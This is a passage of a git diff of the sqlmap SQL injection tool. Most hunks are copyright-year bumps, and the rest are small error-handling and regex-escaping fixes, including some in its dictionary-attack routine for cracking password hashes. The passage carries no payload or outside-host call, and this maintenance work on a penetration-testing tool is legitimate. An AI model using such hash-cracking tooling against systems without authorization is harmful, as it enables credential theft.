                     if not hasattr(conf, "api"):
@@ -640,7 +651,7 @@ def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found
 
             except Exception, e:
                 warnMsg = "there was a problem while hashing entry: %s (%s). " % (repr(word), e)
-                warnMsg += "Please report by e-mail to %s" % ML
+                warnMsg += "Please report by e-mail to 'dev@sqlmap.org'"
                 logger.critical(warnMsg)
 
     except KeyboardInterrupt:
@@ -653,7 +664,7 @@ def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found
 
 def dictionaryAttack(attack_dict):
     suffix_list = [""]
-    custom_wordlist = []
+    custom_wordlist = [""]
     hash_regexes = []
     results = []
     resumes = []
@@ -665,7 +676,7 @@ def dictionaryAttack(attack_dict):
             if not hash_:
                 continue
 
-            hash_ = hash_.split()[0]
+            hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_
             regex = hashRecognition(hash_)
 
             if regex and regex not in hash_regexes:
@@ -682,7 +693,7 @@ def dictionaryAttack(attack_dict):
                 if not hash_:
                     continue
 
-                hash_ = hash_.split()[0]
+                hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_
 
                 if re.match(hash_regex, hash_):
                     item = None
@@ -750,14 +761,16 @@ def dictionaryAttack(attack_dict):
                     else:
                         logger.info("using default dictionary")
 
+                    dictPaths = filter(None, dictPaths)
+
                     for dictPath in dictPaths:
                         checkFile(dictPath)
 
                     kb.wordlists = dictPaths
 
-                except SqlmapFilePathException, msg:
+                except Exception, ex:
                     warnMsg = "there was a problem while loading dictionaries"
-                    warnMsg += " ('%s')" % msg
+                    warnMsg += " ('%s')" % ex.message
                     logger.critical(warnMsg)
 
             message = "do you want to use common password suffixes? (slow!) [y/N] "
@@ -827,7 +840,7 @@ def dictionaryAttack(attack_dict):
                         try:
                             process.terminate()
                             process.join()
-                        except OSError:
+                        except (OSError, AttributeError):
                             pass
 
                 finally:
@@ -921,7 +934,7 @@ def dictionaryAttack(attack_dict):
                             try:
                                 process.terminate()
                                 process.join()
-                            except OSError:
+                            except (OSError, AttributeError):
                                 pass
 
                     finally:
@@ -944,7 +957,7 @@ def dictionaryAttack(attack_dict):
 
     if len(hash_regexes) == 0:
         warnMsg = "unknown hash format. "
-        warnMsg += "Please report by e-mail to %s" % ML
+        warnMsg += "Please report by e-mail to 'dev@sqlmap.org'"
         logger.warn(warnMsg)
 
     if len(results) == 0:
diff --git a/lib/utils/hashdb.py b/lib/utils/hashdb.py
index 9c42cf884..3f20432d9 100644
--- a/lib/utils/hashdb.py
+++ b/lib/utils/hashdb.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -77,8 +77,12 @@ class HashDB(object):
                         for row in self.cursor.execute("SELECT value FROM storage WHERE id=?", (hash_,)):
                             retVal = row[0]
                     except sqlite3.OperationalError, ex:
-                        if not 'locked' in ex.message:
+                        if not "locked" in ex.message:
                             raise
+                    except sqlite3.DatabaseError, ex:
+                        errMsg = "error occurred while accessing session file '%s' ('%s'). " % (self.filepath, ex)
+                        errMsg += "If the problem persists please rerun with `--flush-session`"
+                        raise SqlmapDataException, errMsg
                     else:
                         break
         return retVal if not unserialize else unserializeObject(retVal)
@@ -139,8 +143,15 @@ class HashDB(object):
     def beginTransaction(self):
         threadData = getCurrentThreadData()
         if not threadData.inTransaction:
-            self.cursor.execute("BEGIN TRANSACTION")
-            threadData.inTransaction = True
+            try:
+                self.cursor.execute("BEGIN TRANSACTION")
+            except:
+                # Reference: http://stackoverflow.com/a/25245731
+                self.cursor.close()
+                threadData.hashDBCursor = None
+                self.cursor.execute("BEGIN TRANSACTION")
+            finally:
+                threadData.inTransaction = True
 
     def endTransaction(self):
         threadData = getCurrentThreadData()
diff --git a/lib/utils/htmlentities.py b/lib/utils/htmlentities.py
index 457f461f9..951c5c4a2 100644
--- a/lib/utils/htmlentities.py
+++ b/lib/utils/htmlentities.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/utils/pivotdumptable.py b/lib/utils/pivotdumptable.py
index 6cf9c2275..392c3aaf9 100644
--- a/lib/utils/pivotdumptable.py
+++ b/lib/utils/pivotdumptable.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -64,7 +64,7 @@ def pivotDumpTable(table, colList, count=None, blind=True):
     colList = filter(None, sorted(colList, key=lambda x: len(x) if x else MAX_INT))
 
     if conf.pivotColumn:
-        if any(re.search(r"(.+\.)?%s" % conf.pivotColumn, _, re.I) for _ in colList):
+        if any(re.search(r"(.+\.)?%s" % re.escape(conf.pivotColumn), _, re.I) for _ in colList):
             infoMsg = "using column '%s' as a pivot " % conf.pivotColumn
             infoMsg += "for retrieving row data"
             logger.info(infoMsg)
@@ -173,7 +173,7 @@ def whereQuery(query):
         prefix, suffix = query.split(" ORDER BY ") if " ORDER BY " in query else (query, "")
 
         if "%s)" % conf.tbl.upper() in prefix.upper():
-            prefix = re.sub(r"(?i)%s\)" % conf.tbl, "%s WHERE %s)" % (conf.tbl, conf.dumpWhere), prefix)
+            prefix = re.sub(r"(?i)%s\)" % re.escape(conf.tbl), "%s WHERE %s)" % (conf.tbl, conf.dumpWhere), prefix)
         elif re.search(r"(?i)\bWHERE\b", prefix):
             prefix += " AND %s" % conf.dumpWhere
         else:
diff --git a/lib/utils/progress.py b/lib/utils/progress.py
index e11e6283e..98397d81e 100644
--- a/lib/utils/progress.py
+++ b/lib/utils/progress.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/utils/purge.py b/lib/utils/purge.py
index e1f891cff..1447f8061 100644
--- a/lib/utils/purge.py
+++ b/lib/utils/purge.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -79,4 +79,4 @@ def purge(directory):
     try:
         shutil.rmtree(directory)
     except OSError, ex:
-        logger.error("problem occurred while removing directory '%s' ('%s')" % (directory, ex))
+        logger.error("problem occurred while removing directory '%s' ('%s')" % (directory, unicode(ex)))
diff --git a/lib/utils/sqlalchemy.py b/lib/utils/sqlalchemy.py
index 104d75d4e..1b654ef2f 100644
--- a/lib/utils/sqlalchemy.py
+++ b/lib/utils/sqlalchemy.py
@@ -1,14 +1,13 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
 import imp
 import logging
 import os
-import re
 import sys
 import warnings
 
diff --git a/lib/utils/timeout.py b/lib/utils/timeout.py
index 2fba10bab..950caa717 100644
--- a/lib/utils/timeout.py
+++ b/lib/utils/timeout.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/utils/versioncheck.py b/lib/utils/versioncheck.py
index 802e0cf59..a1cd1175a 100644
--- a/lib/utils/versioncheck.py
+++ b/lib/utils/versioncheck.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/utils/xrange.py b/lib/utils/xrange.py
index 0e988be39..c5931b5d4 100644
--- a/lib/utils/xrange.py
+++ b/lib/utils/xrange.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/__init__.py b/plugins/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/plugins/__init__.py
+++ b/plugins/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/__init__.py b/plugins/dbms/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/plugins/dbms/__init__.py
+++ b/plugins/dbms/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/access/__init__.py b/plugins/dbms/access/__init__.py
index cec2df231..bfb66e57e 100644
--- a/plugins/dbms/access/__init__.py
+++ b/plugins/dbms/access/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/access/connector.py b/plugins/dbms/access/connector.py
index 4d84f02c1..03bcce91e 100644
--- a/plugins/dbms/access/connector.py
+++ b/plugins/dbms/access/connector.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/access/enumeration.py b/plugins/dbms/access/enumeration.py
index d80cb9867..1dc5bd991 100644
--- a/plugins/dbms/access/enumeration.py
+++ b/plugins/dbms/access/enumeration.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/access/filesystem.py b/plugins/dbms/access/filesystem.py
index f373f84db..ee471df2f 100644
--- a/plugins/dbms/access/filesystem.py
+++ b/plugins/dbms/access/filesystem.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/access/fingerprint.py b/plugins/dbms/access/fingerprint.py
index 4b1244d0b..2cbe12835 100644
--- a/plugins/dbms/access/fingerprint.py
+++ b/plugins/dbms/access/fingerprint.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -146,7 +146,7 @@ class Fingerprint(GenericFingerprint):
         return value
 
     def checkDbms(self):
-        if not conf.extensiveFp and (Backend.isDbmsWithin(ACCESS_ALIASES) or conf.dbms in ACCESS_ALIASES):
+        if not conf.extensiveFp and (Backend.isDbmsWithin(ACCESS_ALIASES) or (conf.dbms or "").lower() in ACCESS_ALIASES):
             setDbms(DBMS.ACCESS)
 
             return True
diff --git a/plugins/dbms/access/syntax.py b/plugins/dbms/access/syntax.py
index bd7bf3251..b43500e15 100644
--- a/plugins/dbms/access/syntax.py
+++ b/plugins/dbms/access/syntax.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/access/takeover.py b/plugins/dbms/access/takeover.py
index 5370fe610..f36dd0b7f 100644
--- a/plugins/dbms/access/takeover.py
+++ b/plugins/dbms/access/takeover.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/db2/__init__.py b/plugins/dbms/db2/__init__.py
index afcdd7aae..0a5ea5718 100644
--- a/plugins/dbms/db2/__init__.py
+++ b/plugins/dbms/db2/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/db2/connector.py b/plugins/dbms/db2/connector.py
index 798df4122..feeb9b046 100644
--- a/plugins/dbms/db2/connector.py
+++ b/plugins/dbms/db2/connector.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/db2/enumeration.py b/plugins/dbms/db2/enumeration.py
index 6f6ec2203..ba4fdef9c 100644
--- a/plugins/dbms/db2/enumeration.py
+++ b/plugins/dbms/db2/enumeration.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/db2/filesystem.py b/plugins/dbms/db2/filesystem.py
index 5b548de7c..616958820 100644
--- a/plugins/dbms/db2/filesystem.py
+++ b/plugins/dbms/db2/filesystem.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/db2/fingerprint.py b/plugins/dbms/db2/fingerprint.py
index 59eba684c..bc3f299ac 100644
--- a/plugins/dbms/db2/fingerprint.py
+++ b/plugins/dbms/db2/fingerprint.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -81,7 +81,7 @@ class Fingerprint(GenericFingerprint):
         return value
 
     def checkDbms(self):
-        if not conf.extensiveFp and (Backend.isDbmsWithin(DB2_ALIASES) or conf.dbms in DB2_ALIASES):
+        if not conf.extensiveFp and (Backend.isDbmsWithin(DB2_ALIASES) or (conf.dbms or "").lower() in DB2_ALIASES):
             setDbms(DBMS.DB2)
 
             return True
diff --git a/plugins/dbms/db2/syntax.py b/plugins/dbms/db2/syntax.py
index 403d20a0b..3a46c4d3b 100644
--- a/plugins/dbms/db2/syntax.py
+++ b/plugins/dbms/db2/syntax.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/db2/takeover.py b/plugins/dbms/db2/takeover.py
index 0146b4c7f..a505781cc 100644
--- a/plugins/dbms/db2/takeover.py
+++ b/plugins/dbms/db2/takeover.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/firebird/__init__.py b/plugins/dbms/firebird/__init__.py
index 2772a1813..2c63d088d 100644
--- a/plugins/dbms/firebird/__init__.py
+++ b/plugins/dbms/firebird/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/firebird/connector.py b/plugins/dbms/firebird/connector.py
index 6d153dc5c..0f9beb088 100644
--- a/plugins/dbms/firebird/connector.py
+++ b/plugins/dbms/firebird/connector.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/firebird/enumeration.py b/plugins/dbms/firebird/enumeration.py
index 9a3713743..1945860a0 100644
--- a/plugins/dbms/firebird/enumeration.py
+++ b/plugins/dbms/firebird/enumeration.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/firebird/filesystem.py b/plugins/dbms/firebird/filesystem.py
index a33886659..ed033c2b5 100644
--- a/plugins/dbms/firebird/filesystem.py
+++ b/plugins/dbms/firebird/filesystem.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/firebird/fingerprint.py b/plugins/dbms/firebird/fingerprint.py
index 9c22a4708..8a8de5c70 100644
--- a/plugins/dbms/firebird/fingerprint.py
+++ b/plugins/dbms/firebird/fingerprint.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -104,7 +104,7 @@ class Fingerprint(GenericFingerprint):
 
     def checkDbms(self):
         if not conf.extensiveFp and (Backend.isDbmsWithin(FIREBIRD_ALIASES) \
-           or conf.dbms in FIREBIRD_ALIASES) and Backend.getVersion() and \
+           or (conf.dbms or "").lower() in FIREBIRD_ALIASES) and Backend.getVersion() and \
            Backend.getVersion() != UNKNOWN_DBMS_VERSION:
             v = Backend.getVersion().replace(">", "")
             v = v.replace("=", "")
diff --git a/plugins/dbms/firebird/syntax.py b/plugins/dbms/firebird/syntax.py
index 6bc000fc5..c59666ade 100644
--- a/plugins/dbms/firebird/syntax.py
+++ b/plugins/dbms/firebird/syntax.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/firebird/takeover.py b/plugins/dbms/firebird/takeover.py
index 7ebfc4217..78589f5a4 100644
--- a/plugins/dbms/firebird/takeover.py
+++ b/plugins/dbms/firebird/takeover.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/hsqldb/__init__.py b/plugins/dbms/hsqldb/__init__.py
index fa7a4265f..128704f61 100644
--- a/plugins/dbms/hsqldb/__init__.py
+++ b/plugins/dbms/hsqldb/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/hsqldb/connector.py b/plugins/dbms/hsqldb/connector.py
index ed5c8b108..0496badb4 100644
--- a/plugins/dbms/hsqldb/connector.py
+++ b/plugins/dbms/hsqldb/connector.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/hsqldb/enumeration.py b/plugins/dbms/hsqldb/enumeration.py
index 43122d61f..9bf2b9b23 100644
--- a/plugins/dbms/hsqldb/enumeration.py
+++ b/plugins/dbms/hsqldb/enumeration.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -30,3 +30,13 @@ class Enumeration(GenericEnumeration):
             kb.data.banner = unArrayizeValue(inject.getValue(query, safeCharEncode=True))
 
         return kb.data.banner
+
+    def getPrivileges(self, *args):
+        warnMsg = "on HSQLDB it is not possible to enumerate the user privileges"
+        logger.warn(warnMsg)
+
+        return {}
+
+    def getHostname(self):
+        warnMsg = "on HSQLDB it is not possible to enumerate the hostname"
+        logger.warn(warnMsg)
diff --git a/plugins/dbms/hsqldb/filesystem.py b/plugins/dbms/hsqldb/filesystem.py
index 9bb30d4b3..3e9dd9026 100644
--- a/plugins/dbms/hsqldb/filesystem.py
+++ b/plugins/dbms/hsqldb/filesystem.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/hsqldb/fingerprint.py b/plugins/dbms/hsqldb/fingerprint.py
index 1b58fc356..9f527a601 100644
--- a/plugins/dbms/hsqldb/fingerprint.py
+++ b/plugins/dbms/hsqldb/fingerprint.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -81,7 +81,7 @@ class Fingerprint(GenericFingerprint):
         """
 
         if not conf.extensiveFp and (Backend.isDbmsWithin(HSQLDB_ALIASES) \
-           or conf.dbms in HSQLDB_ALIASES) and Backend.getVersion() and \
+           or (conf.dbms or "").lower() in HSQLDB_ALIASES) and Backend.getVersion() and \
            Backend.getVersion() != UNKNOWN_DBMS_VERSION:
             v = Backend.getVersion().replace(">", "")
             v = v.replace("=", "")
@@ -134,7 +134,7 @@ class Fingerprint(GenericFingerprint):
 
             return True
         else:
-            warnMsg = "the back-end DBMS is not %s or is < 1.7.2" % DBMS.HSQLDB
+            warnMsg = "the back-end DBMS is not %s or version is < 1.7.2" % DBMS.HSQLDB
             logger.warn(warnMsg)
 
             return False
diff --git a/plugins/dbms/hsqldb/syntax.py b/plugins/dbms/hsqldb/syntax.py
index e465100fe..c2927406b 100644
--- a/plugins/dbms/hsqldb/syntax.py
+++ b/plugins/dbms/hsqldb/syntax.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/hsqldb/takeover.py b/plugins/dbms/hsqldb/takeover.py
index e8e87336a..6d007a6b2 100644
--- a/plugins/dbms/hsqldb/takeover.py
+++ b/plugins/dbms/hsqldb/takeover.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/maxdb/__init__.py b/plugins/dbms/maxdb/__init__.py
index 70259d523..9370a87c6 100644
--- a/plugins/dbms/maxdb/__init__.py
+++ b/plugins/dbms/maxdb/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/maxdb/connector.py b/plugins/dbms/maxdb/connector.py
index adf4a75c9..1f9feca61 100644
--- a/plugins/dbms/maxdb/connector.py
+++ b/plugins/dbms/maxdb/connector.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/maxdb/enumeration.py b/plugins/dbms/maxdb/enumeration.py
index 1a784d5a0..95ec6a385 100644
--- a/plugins/dbms/maxdb/enumeration.py
+++ b/plugins/dbms/maxdb/enumeration.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/maxdb/filesystem.py b/plugins/dbms/maxdb/filesystem.py
index 89346627d..00d14a7f0 100644
--- a/plugins/dbms/maxdb/filesystem.py
+++ b/plugins/dbms/maxdb/filesystem.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/maxdb/fingerprint.py b/plugins/dbms/maxdb/fingerprint.py
index 60a391448..57f24fb88 100644
--- a/plugins/dbms/maxdb/fingerprint.py
+++ b/plugins/dbms/maxdb/fingerprint.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -91,7 +91,7 @@ class Fingerprint(GenericFingerprint):
         return value
 
     def checkDbms(self):
-        if not conf.extensiveFp and (Backend.isDbmsWithin(MAXDB_ALIASES) or conf.dbms in MAXDB_ALIASES):
+        if not conf.extensiveFp and (Backend.isDbmsWithin(MAXDB_ALIASES) or (conf.dbms or "").lower() in MAXDB_ALIASES):
             setDbms(DBMS.MAXDB)
 
             self.getBanner()
diff --git a/plugins/dbms/maxdb/syntax.py b/plugins/dbms/maxdb/syntax.py
index ff0b61602..b8612b3a1 100644
--- a/plugins/dbms/maxdb/syntax.py
+++ b/plugins/dbms/maxdb/syntax.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/maxdb/takeover.py b/plugins/dbms/maxdb/takeover.py
index 45d0eca93..32d3a0969 100644
--- a/plugins/dbms/maxdb/takeover.py
+++ b/plugins/dbms/maxdb/takeover.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/mssqlserver/__init__.py b/plugins/dbms/mssqlserver/__init__.py
index d5eb669c8..c701c0f9f 100644
--- a/plugins/dbms/mssqlserver/__init__.py
+++ b/plugins/dbms/mssqlserver/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/mssqlserver/connector.py b/plugins/dbms/mssqlserver/connector.py
index e935eef84..657d796fd 100644
--- a/plugins/dbms/mssqlserver/connector.py
+++ b/plugins/dbms/mssqlserver/connector.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
